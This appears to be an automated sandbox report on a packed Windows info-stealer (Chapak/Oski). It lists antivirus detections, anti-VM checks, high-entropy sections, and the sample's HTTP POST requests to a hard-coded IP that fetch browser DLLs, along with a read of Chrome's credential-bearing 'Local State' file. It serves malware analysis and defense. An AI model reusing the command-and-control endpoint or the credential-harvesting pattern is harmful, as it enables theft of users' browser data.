| 查杀引擎 | 查杀结果 | 查杀时间 | 查杀版本 |
|---|---|---|---|
| Alibaba | Trojan:Win32/Chapak.3a51f688 | 20190527 | 0.3.0.5 |
| Baidu | 20190318 | 1.0.0.2 | |
| Avast | Win32:Trojan-gen | 20210309 | 21.1.5827.0 |
| Kingsoft | Win32.Heur.KVMH008.a.(kcloud) | 20210309 | 2017.9.26.565 |
| McAfee | Artemis!53C17933CC04 | 20210309 | 6.0.6.653 |
| Tencent | Win32.Trojan.Chapak.Swkv | 20210309 | 1.0.0.1 |
| CrowdStrike | win/malicious_confidence_100% (W) | 20210203 | 1.0 |
| Time & API | Arguments | Status | Return | Repeated |
|---|---|---|---|---|
|
1619426985.925605 GetComputerNameA |
computer_name:
OSKAR-PC
|
success | 1 | 0 |
| section | |
| section | .imports |
| section | .vmp0 |
| section | .themida |
| section | .loadcon |
| section | .boot |
| section | .vmp1 |
| suspicious_features | POST method with no referer header, POST method with no useragent header, Connection to IP address | suspicious_request | POST http://199.192.24.69/b4kYUOYBvbk44//softokn3.dll | ||||||
| suspicious_features | POST method with no referer header, POST method with no useragent header, Connection to IP address | suspicious_request | POST http://199.192.24.69/b4kYUOYBvbk44//sqlite3.dll | ||||||
| suspicious_features | POST method with no referer header, POST method with no useragent header, Connection to IP address | suspicious_request | POST http://199.192.24.69/b4kYUOYBvbk44//freebl3.dll | ||||||
| suspicious_features | POST method with no referer header, POST method with no useragent header, Connection to IP address | suspicious_request | POST http://199.192.24.69/b4kYUOYBvbk44//mozglue.dll | ||||||
| suspicious_features | POST method with no referer header, POST method with no useragent header, Connection to IP address | suspicious_request | POST http://199.192.24.69/b4kYUOYBvbk44//msvcp140.dll | ||||||
| suspicious_features | POST method with no referer header, POST method with no useragent header, Connection to IP address | suspicious_request | POST http://199.192.24.69/b4kYUOYBvbk44//nss3.dll | ||||||
| suspicious_features | POST method with no referer header, POST method with no useragent header, Connection to IP address | suspicious_request | POST http://199.192.24.69/b4kYUOYBvbk44//vcruntime140.dll | ||||||
| request | POST http://199.192.24.69/b4kYUOYBvbk44//softokn3.dll |
| request | POST http://199.192.24.69/b4kYUOYBvbk44//sqlite3.dll |
| request | POST http://199.192.24.69/b4kYUOYBvbk44//freebl3.dll |
| request | POST http://199.192.24.69/b4kYUOYBvbk44//mozglue.dll |
| request | POST http://199.192.24.69/b4kYUOYBvbk44//msvcp140.dll |
| request | POST http://199.192.24.69/b4kYUOYBvbk44//nss3.dll |
| request | POST http://199.192.24.69/b4kYUOYBvbk44//vcruntime140.dll |
| request | POST http://199.192.24.69/b4kYUOYBvbk44//softokn3.dll |
| request | POST http://199.192.24.69/b4kYUOYBvbk44//sqlite3.dll |
| request | POST http://199.192.24.69/b4kYUOYBvbk44//freebl3.dll |
| request | POST http://199.192.24.69/b4kYUOYBvbk44//mozglue.dll |
| request | POST http://199.192.24.69/b4kYUOYBvbk44//msvcp140.dll |
| request | POST http://199.192.24.69/b4kYUOYBvbk44//nss3.dll |
| request | POST http://199.192.24.69/b4kYUOYBvbk44//vcruntime140.dll |
| file | C:\Users\Administrator.Oskar-PC\AppData\Local\Google\Chrome\User Data\Local State |
| file | C:\ProgramData\sqlite3.dll |
| file | C:\ProgramData\freebl3.dll |
| file | C:\ProgramData\msvcp140.dll |
| file | C:\ProgramData\nss3.dll |
| file | C:\ProgramData\vcruntime140.dll |
| file | C:\ProgramData\mozglue.dll |
| file | C:\ProgramData\softokn3.dll |
| Time & API | Arguments | Status | Return | Repeated |
|---|---|---|---|---|
|
1619426986.753605 GetAdaptersAddresses |
flags:
0
family: 0 |
failed | 111 | 0 |
| entropy | 7.997267464059673 | section | {'size_of_data': '0x00010249', 'virtual_address': '0x00001000', 'entropy': 7.997267464059673, 'name': ' ', 'virtual_size': '0x00025763'} | description | A section with a high entropy has been found | |||||||||
| entropy | 7.983912641712787 | section | {'size_of_data': '0x00002c89', 'virtual_address': '0x00027000', 'entropy': 7.983912641712787, 'name': ' ', 'virtual_size': '0x00007d78'} | description | A section with a high entropy has been found | |||||||||
| entropy | 7.752986695593336 | section | {'size_of_data': '0x00000323', 'virtual_address': '0x0002f000', 'entropy': 7.752986695593336, 'name': ' ', 'virtual_size': '0x000043c8'} | description | A section with a high entropy has been found | |||||||||
| entropy | 7.999548445666599 | section | {'size_of_data': '0x0005b60f', 'virtual_address': '0x00034000', 'entropy': 7.999548445666599, 'name': ' ', 'virtual_size': '0x00089550'} | description | A section with a high entropy has been found | |||||||||
| entropy | 7.96933748766608 | section | {'size_of_data': '0x0000194d', 'virtual_address': '0x000be000', 'entropy': 7.96933748766608, 'name': ' ', 'virtual_size': '0x000021cc'} | description | A section with a high entropy has been found | |||||||||
| entropy | 7.999168298855208 | section | {'size_of_data': '0x00035463', 'virtual_address': '0x000c1000', 'entropy': 7.999168298855208, 'name': ' ', 'virtual_size': '0x000dde96'} | description | A section with a high entropy has been found | |||||||||
| entropy | 7.9992443992387 | section | {'size_of_data': '0x00033800', 'virtual_address': '0x001a0000', 'entropy': 7.9992443992387, 'name': '.vmp0', 'virtual_size': '0x00033800'} | description | A section with a high entropy has been found | |||||||||
| entropy | 7.957961351131541 | section | {'size_of_data': '0x00134c00', 'virtual_address': '0x004f5000', 'entropy': 7.957961351131541, 'name': '.boot', 'virtual_size': '0x00134c00'} | description | A section with a high entropy has been found | |||||||||
| entropy | 7.506238099464433 | section | {'size_of_data': '0x00000600', 'virtual_address': '0x0062a000', 'entropy': 7.506238099464433, 'name': '.vmp1', 'virtual_size': '0x000005d0'} | description | A section with a high entropy has been found | |||||||||
| entropy | 7.516709986497975 | section | {'size_of_data': '0x00000600', 'virtual_address': '0x0062b000', 'entropy': 7.516709986497975, 'name': '.vmp0', 'virtual_size': '0x000005d0'} | description | A section with a high entropy has been found | |||||||||
| entropy | 0.9102867884122687 | description | Overall entropy of this PE file is high | |||||||||||
| section | .vmp0 | description | Section name indicates VMProtect | ||||||
| section | .vmp1 | description | Section name indicates VMProtect | ||||||
| section | .vmp0 | description | Section name indicates VMProtect | ||||||
| host | 172.217.24.14 | |||
| host | 199.192.24.69 | |||
| registry | HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion |
| registry | HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion |
| registry | HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ |
| Time & API | Arguments | Status | Return | Repeated |
|---|---|---|---|---|
|
1619426984.690605 NtQuerySystemInformation |
information_class:
76
(SystemFirmwareTableInformation)
|
failed | 3221225507 | 0 |
| Bkav | W32.AIDetect.malware1 |
| Elastic | malicious (high confidence) |
| MicroWorld-eScan | Trojan.GenericKD.34007713 |
| ALYac | Trojan.GenericKD.34007713 |
| Cylance | Unsafe |
| Zillya | Trojan.Chapak.Win32.86043 |
| Sangfor | Trojan.Win32.Save.a |
| K7AntiVirus | Trojan ( 00563cb01 ) |
| Alibaba | Trojan:Win32/Chapak.3a51f688 |
| K7GW | Trojan ( 00563cb01 ) |
| Cybereason | malicious.3cc042 |
| Arcabit | Trojan.Generic.D206EAA1 |
| BitDefenderTheta | Gen:NN.ZexaF.34608.q!0@a8rPXwhi |
| Symantec | ML.Attribute.HighConfidence |
| APEX | Malicious |
| Avast | Win32:Trojan-gen |
| ClamAV | Win.Trojan.Agent-8036407-0 |
| Kaspersky | Trojan.Win32.Chapak.emyr |
| BitDefender | Trojan.GenericKD.34007713 |
| NANO-Antivirus | Trojan.Win32.Chapak.hneodt |
| Paloalto | generic.ml |
| Rising | Trojan.Chapak!8.F507 (CLOUD) |
| Ad-Aware | Trojan.GenericKD.34007713 |
| Sophos | Mal/Generic-S |
| Comodo | Malware@#ot5v0gk88cno |
| F-Secure | Trojan.TR/Chapak.rrfdg |
| VIPRE | Trojan.Win32.Generic!BT |
| McAfee-GW-Edition | BehavesLike.Win32.Trojan.vc |
| FireEye | Generic.mg.53c17933cc042573 |
| Emsisoft | Trojan.Packed (A) |
| SentinelOne | Static AI - Suspicious PE |
| ESET-NOD32 | a variant of Win32/Packed.Themida.HJY |
| Avira | TR/Chapak.rrfdg |
| MAX | malware (ai score=100) |
| Antiy-AVL | Trojan/Win32.Chapak |
| Kingsoft | Win32.Heur.KVMH008.a.(kcloud) |
| Gridinsoft | Trojan.Win32.Injector.dd!n |
| Microsoft | SoftwareBundler:Win32/Prepscram |
| AegisLab | Trojan.Win32.Chapak.4!c |
| ZoneAlarm | Trojan.Win32.Chapak.emyr |
| GData | Trojan.GenericKD.34007713 |
| Cynet | Malicious (score: 90) |
| AhnLab-V3 | PUP/Win32.RL_Generic.R345990 |
| Acronis | suspicious |
| McAfee | Artemis!53C17933CC04 |
| VBA32 | Trojan.Chapak |
| Malwarebytes | Spyware.Oski |
| Tencent | Win32.Trojan.Chapak.Swkv |
| Yandex | Trojan.Themida!ntBrnlD7X58 |
| Ikarus | Trojan.Win32.Themida |
No hosts contacted.
| Name | Response | Post-Analysis Lookup |
|---|---|---|
| time.windows.com |
A 20.189.79.72
CNAME time.microsoft.akadns.net |
|
| dns.msftncsi.com | A 131.107.255.255 | 131.107.255.255 |
| dns.msftncsi.com | AAAA fd3e:4f5a:5b81::1 | 131.107.255.255 |
| teredo.ipv6.microsoft.com | 127.0.0.1 |
| Source | Source Port | Destination | Destination Port |
|---|---|---|---|
| 192.168.56.101 | 49175 | 199.192.24.69 | 80 |
| Source | Source Port | Destination | Destination Port |
|---|---|---|---|
| 192.168.56.101 | 49235 | 114.114.114.114 | 53 |
| 192.168.56.101 | 50534 | 114.114.114.114 | 53 |
| 192.168.56.101 | 56539 | 114.114.114.114 | 53 |
| 192.168.56.101 | 58367 | 114.114.114.114 | 53 |
| 192.168.56.101 | 65004 | 114.114.114.114 | 53 |
| 192.168.56.101 | 137 | 192.168.56.255 | 137 |
| 192.168.56.101 | 138 | 192.168.56.255 | 138 |
| 192.168.56.101 | 123 | 20.189.79.72 time.windows.com | 123 |
| 192.168.56.101 | 53657 | 224.0.0.252 | 5355 |
| 192.168.56.101 | 55368 | 224.0.0.252 | 5355 |
| 192.168.56.101 | 56804 | 224.0.0.252 | 5355 |
| 192.168.56.101 | 60123 | 224.0.0.252 | 5355 |
| 192.168.56.101 | 62191 | 224.0.0.252 | 5355 |
| 192.168.56.101 | 1900 | 239.255.255.250 | 1900 |
| 192.168.56.101 | 56540 | 239.255.255.250 | 3702 |
| 192.168.56.101 | 56807 | 239.255.255.250 | 1900 |
| 192.168.56.101 | 58368 | 239.255.255.250 | 3702 |
| 192.168.56.101 | 58707 | 239.255.255.250 | 3702 |
| URI | Data |
|---|---|
| http://199.192.24.69/b4kYUOYBvbk44//msvcp140.dll | POST /b4kYUOYBvbk44//msvcp140.dll HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A Content-Length: 25 Host: 199.192.24.69 Connection: Keep-Alive Cache-Control: no-cache --1BEF0A57BE110FD467A-- |
| http://199.192.24.69/b4kYUOYBvbk44//sqlite3.dll | POST /b4kYUOYBvbk44//sqlite3.dll HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A Content-Length: 25 Host: 199.192.24.69 Connection: Keep-Alive Cache-Control: no-cache --1BEF0A57BE110FD467A-- |
| http://199.192.24.69/b4kYUOYBvbk44//softokn3.dll | POST /b4kYUOYBvbk44//softokn3.dll HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A Content-Length: 25 Host: 199.192.24.69 Connection: Keep-Alive Cache-Control: no-cache --1BEF0A57BE110FD467A-- |
| http://199.192.24.69/b4kYUOYBvbk44//vcruntime140.dll | POST /b4kYUOYBvbk44//vcruntime140.dll HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A Content-Length: 25 Host: 199.192.24.69 Connection: Keep-Alive Cache-Control: no-cache --1BEF0A57BE110FD467A-- |
| http://199.192.24.69/b4kYUOYBvbk44//nss3.dll | POST /b4kYUOYBvbk44//nss3.dll HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A Content-Length: 25 Host: 199.192.24.69 Connection: Keep-Alive Cache-Control: no-cache --1BEF0A57BE110FD467A-- |
| http://199.192.24.69/b4kYUOYBvbk44//mozglue.dll | POST /b4kYUOYBvbk44//mozglue.dll HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A Content-Length: 25 Host: 199.192.24.69 Connection: Keep-Alive Cache-Control: no-cache --1BEF0A57BE110FD467A-- |
| http://199.192.24.69/b4kYUOYBvbk44//freebl3.dll | POST /b4kYUOYBvbk44//freebl3.dll HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A Content-Length: 25 Host: 199.192.24.69 Connection: Keep-Alive Cache-Control: no-cache --1BEF0A57BE110FD467A-- |
No ICMP traffic performed.
No IRC requests performed.
No Suricata Alerts
No Suricata TLS
No Snort Alerts